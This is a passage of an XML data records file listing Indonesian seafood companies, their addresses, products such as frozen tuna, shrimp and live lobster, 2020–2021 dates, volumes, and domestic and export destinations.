    <s v="Jl, Hatni No,200A Km 60,8, Kel, Tlogosadang, Kec, Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="China, Japan, Malaysia, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22770"/>
    <x v="745"/>
    <s v="PT. KARYA DOUBLE DELAPAN"/>
    <s v="Jl. Bypass Ngurah Rai Gang Mina Utama No.10, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Balimong, Janahan, Kakao, Kerapu, Kurisi)"/>
    <d v="2020-11-04T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Badung"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="22771"/>
    <x v="745"/>
    <s v="PT. KARYA DOUBLE DELAPAN"/>
    <s v="Jl. Bypass Ngurah Rai Gang Mina Utama No.10, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2020-11-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Yogyakarta, Kabupaten Badung, Kota Denpasar"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22772"/>
    <x v="745"/>
    <s v="PT. KARYA DOUBLE DELAPAN"/>
    <s v="Jl. Bypass Ngurah Rai Gang Mina Utama No.10, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Balimong, Janahan, Kakap, Kerapu, Kurisi)"/>
    <d v="2020-11-04T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Badung, Kota Denpasar"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="22773"/>
    <x v="745"/>
    <s v="PT. KARYA DOUBLE DELAPAN"/>
    <s v="Jl. Bypass Ngurah Rai Gang Mina Utama No.10, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Yogyakarta, Kabupaten Badung, Kota Denpasar"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="22774"/>
    <x v="746"/>
    <s v="PT. KELOLA MINA LAUT UNIT LOBUK"/>
    <s v="Desa Lobuk, Kel. Lobuk, Kec. Bluto, Kabupaten Sumenep&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Himego Kering"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="50"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22775"/>
    <x v="746"/>
    <s v="PT. KELOLA MINA LAUT UNIT LOBUK"/>
    <s v="Desa Lobuk, Kel. Lobuk, Kec. Bluto, Kabupaten Sumenep&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teri Asin Kering"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22776"/>
    <x v="746"/>
    <s v="PT. KELOLA MINA LAUT UNIT LOBUK"/>
    <s v="Desa Lobuk, Kel. Lobuk, Kec. Bluto, Kabupaten Sumenep&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Rebus Dingin"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="20000"/>
    <s v="Kabupaten Gresik"/>
    <m/>
  </r>
  <r>
    <n v="22777"/>
    <x v="746"/>
    <s v="PT. KELOLA MINA LAUT UNIT LOBUK"/>
    <s v="Desa Lobuk, Kel. Lobuk, Kec. Bluto, Kabupaten Sumenep&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="22778"/>
    <x v="747"/>
    <s v="UD. SONI"/>
    <s v="Jl. TPI Pulau Baai RT 10 RW 02, Kel. Sumber Jaya, Kec. Kampung Melayu, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Ikan Demersal Segar (Layur, Bawal, Kakap)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="6000000"/>
    <s v="Kota Padang, Kota Bandar Lampung, Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="22779"/>
    <x v="747"/>
    <s v="UD. SONI"/>
    <s v="Jl. TPI Pulau Baai RT 10 RW 02, Kel. Sumber Jaya, Kec. Kampung Melayu, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Ikan Demersal Beku (Layur, Bawal, Kakap)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="6000000"/>
    <s v="Kota Padang, Kota Bandar Lampung, Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="22780"/>
    <x v="747"/>
    <s v="UD. SONI "/>
    <s v="Jl. TPI Pulau Baai RT 10 RW 02, Kel. Sumber Jaya, Kec. Kampung Melayu, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22781"/>
    <x v="669"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Lamelleng No.42, Kel. Bojo Baru, Kec. Mallusetasi, Kabupaten Barru&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Kaleng"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="30000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22783"/>
    <x v="70"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="12000"/>
    <s v="Kabupaten Sidoarjo"/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22785"/>
    <x v="702"/>
    <s v="DAPUR SAUJA"/>
    <s v="Tridaya Nuansa Indah, Jl. Kelapa Gading Raya EA.9 No.12A, Kel. Sumber Jaya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Otak-Otak Ikan"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="18000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kota Depok, Kota Denpasar, Kota Makassar"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22786"/>
    <x v="702"/>
    <s v="DAPUR SAUJA"/>
    <s v="Tridaya Nuansa Indah, Jl. Kelapa Gading Raya EA.9 No.12A, Kel. Sumber Jaya, Kec. Tambun Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Pempek Ikan"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="18000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="22787"/>
    <x v="308"/>
    <s v="CV, PESONA MANDIRI"/>
    <s v="Jl, Ikan Belanak No,01, Kel, Mayangan, Kec, Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Kerang Beku"/>
    <d v="2020-12-01T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22788"/>
    <x v="748"/>
    <s v="PT. STAR MARINDO"/>
    <s v="Jl. Muara Baru, Kawasan PPS Nizam Zachman, Blok J No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="528000"/>
    <m/>
    <s v="Austria, China, R√©union, United States"/>
  </r>
  <r>
    <n v="22789"/>
    <x v="748"/>
    <s v="PT. STAR MARINDO"/>
    <s v="Jl. Muara Baru, Kawasan PPS Nizam Zachman, Blok J No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="France, Japan, Netherlands, United States"/>
  </r>
  <r>
    <n v="22790"/>
    <x v="748"/>
    <s v="PT. STAR MARINDO"/>
    <s v="Jl. Muara Baru, Kawasan PPS Nizam Zachman, Blok J No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin, Meka, Nike, Gindara, Tenggiri)"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="France, Japan, United States, Viet Nam"/>
  </r>
  <r>
    <n v="22792"/>
    <x v="748"/>
    <s v="PT. STAR MARINDO"/>
    <s v="Jl. Muara Baru, Kawasan PPS Nizam Zachman, Blok J No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, France, Japan, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="22794"/>
    <x v="749"/>
    <s v="PT. BUMI MENARA INTERNUSA - DAMPIT"/>
    <s v="Jl. Pahlawan No.1-3, Kel. Dampit, Kec. Dampit, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="1075248"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22795"/>
    <x v="749"/>
    <s v="PT. BUMI MENARA INTERNUSA - DAMPIT"/>
    <s v="Jl. Pahlawan No.1-3, Kel. Dampit, Kec. Dampit, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="946906"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22797"/>
    <x v="749"/>
    <s v="PT. BUMI MENARA INTERNUSA - DAMPIT"/>
    <s v="Jl. Pahlawan No.1-3, Kel. Dampit, Kec. Dampit, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Patin, Nila, Bandeng)"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22798"/>
    <x v="749"/>
    <s v="PT. BUMI MENARA INTERNUSA - DAMPIT"/>
    <s v="Jl. Pahlawan No.1-3, Kel. Dampit, Kec. Dampit, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22799"/>
    <x v="749"/>
    <s v="PT. BUMI MENARA INTERNUSA - DAMPIT"/>
    <s v="Jl. Pahlawan No.1-3, Kel. Dampit, Kec. Dampit, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22801"/>
    <x v="749"/>
    <s v="PT. BUMI MENARA INTERNUSA - DAMPIT"/>
    <s v="Jl. Pahlawan No.1-3, Kel. Dampit, Kec. Dampit, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Kakatua, Kakap)"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22802"/>
    <x v="749"/>
    <s v="PT. BUMI MENARA INTERNUSA - DAMPIT"/>
    <s v="Jl. Pahlawan No.1-3, Kel. Dampit, Kec. Dampit, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Bekicot Beku"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="98412"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22803"/>
    <x v="656"/>
    <s v="PT. SEKAR BUMI, TBK PLANT II"/>
    <s v="Jl. Jenggolo 2/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sambal Terasi Udang"/>
    <d v="2020-12-10T00:00:00"/>
    <n v="18000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="22804"/>
    <x v="749"/>
    <s v="PT. BUMI MENARA INTERNUSA - DAMPIT"/>
    <s v="Jl. Pahlawan No.1-3, Kel. Dampit, Kec. Dampit, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Seafood Bernilai Tambah Beku "/>
    <d v="2020-11-05T00:00:00"/>
    <n v="3055424"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22805"/>
    <x v="749"/>
    <s v="PT. BUMI MENARA INTERNUSA - DAMPIT"/>
    <s v="Jl. Pahlawan No.1-3, Kel. Dampit, Kec. Dampit, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Seafood Bernilai Tambah Masak Beku"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22808"/>
    <x v="750"/>
    <s v="CABANG LAMPUNG BUMI MENARA INTERNUSA, PT."/>
    <s v="Jl. Ir. Sutami KM 12, Desa Lematang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung 35122"/>
    <n v="10"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="4500000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22809"/>
    <x v="750"/>
    <s v="CABANG LAMPUNG BUMI MENARA INTERNUSA, PT."/>
    <s v="Jl. Ir. Sutami KM 12, Desa Lematang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung 35122"/>
    <n v="10"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="4500000"/>
    <s v="Kabupaten Lampung Selatan"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22810"/>
    <x v="750"/>
    <s v="CABANG LAMPUNG BUMI MENARA INTERNUSA, PT."/>
    <s v="Jl. Ir. Sutami KM 12, Desa Lematang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung 35122"/>
    <n v="10"/>
    <s v="Ikan Demersal Beku (Kod, Yellowfin Sole, Yellowtail Flounder)"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="378000"/>
    <m/>
    <s v="Canada, United States"/>
  </r>
  <r>
    <n v="22811"/>
    <x v="750"/>
    <s v="CABANG LAMPUNG BUMI MENARA INTERNUSA, PT."/>
    <s v="Jl. Ir. Sutami KM 12, Desa Lematang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung 35122"/>
    <n v="10"/>
    <s v="Daging Rajungan Pasteurisasi "/>
    <d v="2020-11-05T00:00:00"/>
    <n v="280000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22812"/>
    <x v="751"/>
    <s v="PT. TRANS ANUGRAH MULIA"/>
    <s v="Pattene Bussines Park Blok U3 B, Kel. Temmapaduae, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Surabaya"/>
    <s v="American Samoa, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22813"/>
    <x v="751"/>
    <s v="PT. TRANS ANUGRAH MULIA"/>
    <s v="Pattene Bussines Park Blok U3 B, Kel. Temmapaduae, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Kerisi, Kerapu, Kaneke, Pinjalo, Kakap)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Surabaya"/>
    <s v="American Samoa, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22814"/>
    <x v="751"/>
    <s v="PT. TRANS ANUGRAH MULIA"/>
    <s v="Pattene Bussines Park Blok U3 B, Kel. Temmapaduae, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Barakuda, Bonito, Marlin, Tenggiri)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Surabaya"/>
    <s v="American Samoa, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22815"/>
    <x v="751"/>
    <s v="PT. TRANS ANUGRAH MULIA"/>
    <s v="Pattene Bussines Park Blok U3 B, Kel. Temmapaduae, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kerapu, Kaneke, Kakap, Kurisi)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Surabaya"/>
    <s v="American Samoa, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22816"/>
    <x v="751"/>
    <s v="PT. TRANS ANUGRAH MULIA"/>
    <s v="Pattene Bussines Park Blok U3 B, Kel. Temmapaduae, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Barakuda, Bonito, Tenggiri)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Surabaya"/>
    <s v="American Samoa, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="22817"/>
    <x v="19"/>
    <s v="PT. SEAFOOD SUMATERA PERKASA"/>
    <s v="Jl. Titi Pahlawan No.38, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Cyprus, Italy"/>
  </r>
  <r>
    <n v="22818"/>
    <x v="752"/>
    <s v="CV. SUGARINDO TRADING CO"/>
    <s v="Jl. Bakau No.60, Kel. Balandai, Kec. Bara, Kota Palopo&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Situbondo"/>
    <s v="Chile, China, Japan, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="22824"/>
    <x v="753"/>
    <s v="PERUM PERIKANAN INDONESIA CABANG MERAUKE"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Merauke, Kel. Karang Indah, Kec. Merauke, Kabupaten Merauke&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Ikan Demesal Beku (Kakap Putih, Bawal, Senangin, Manyung)"/>
    <d v="2020-12-07T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Sri Lanka, Taiwan, Province of China, Thailand, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="22826"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Hidup"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="3000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22827"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Hidup"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22828"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Keong Hidup"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="3000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22829"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Hidup"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22830"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="3000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22831"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sidat Hidup"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22832"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Air Tawar Hidup (Betutu)"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22833"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Hidup"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22834"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Kerang Beku"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22835"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Segar (Kembung, Layang, Tongkol, Cakalang, Tenggiri, Marlin, Layaran)"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="15000000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22836"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Segar"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22837"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Segar (Bawal, Layur, Kakap, Kerapu)"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="22838"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Telur Ikan Segar"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22839"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering "/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Hong Kong, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="22840"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Hiu Segar"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22841"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Pari Segar"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22842"/>
    <x v="82"/>
    <s v="CV. MUARA LAUT"/>
    <s v="Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Abalone Kering"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22844"/>
    <x v="156"/>
    <s v="CV. ANUGRAH BINTANG CEMERLANG"/>
    <s v="Jl. Bambu Runcing No.99, Kel. Pettuadae, Kec. Turikale, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Beku"/>
    <d v="2020-11-11T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22845"/>
    <x v="156"/>
    <s v="CV. ANUGRAH BINTANG CEMERLANG"/>
    <s v="Jl. Bambu Runcing No.99, Kel. Pettuadae, Kec. Turikale, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-11T00:00:00"/>
